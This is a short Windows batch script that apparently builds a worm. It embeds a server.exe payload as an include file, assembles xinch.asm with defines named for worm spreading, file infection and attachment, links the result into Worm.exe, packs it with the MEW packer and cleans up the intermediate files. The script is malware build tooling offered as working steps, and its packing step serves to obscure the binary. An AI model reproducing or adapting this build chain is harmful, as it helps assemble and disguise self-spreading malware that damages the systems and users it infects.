@echo off
cd Worm
copy ..\server.exe functions\file.tmp
compiler\EncodeToDb.exe functions\file.tmp functions\file.inc
rem compiler\EncodeToDb.exe ie\hosts.txt ie\hosts.inc
compiler\ml /DX_NOTSEND /DX_WORM /DX_INFECT /DX_HYWK /DX_ATTACH /DX_RUNNORMAL /nologo /c /coff /Cp /WX /I\include xinch.asm > err.txt
compiler\link /RELEASE /nologo /SUBSYSTEM:WINDOWS /LIBPATH:\library /OUT:..\Worm.exe xinch.obj
Packer\mew11.exe ..\Worm.exe
if exist xinch.obj Del xinch.obj
if exist xinch_rc.obj Del xinch_rc.obj
if exist temp Del temp
if exist xinch.res Del xinch.res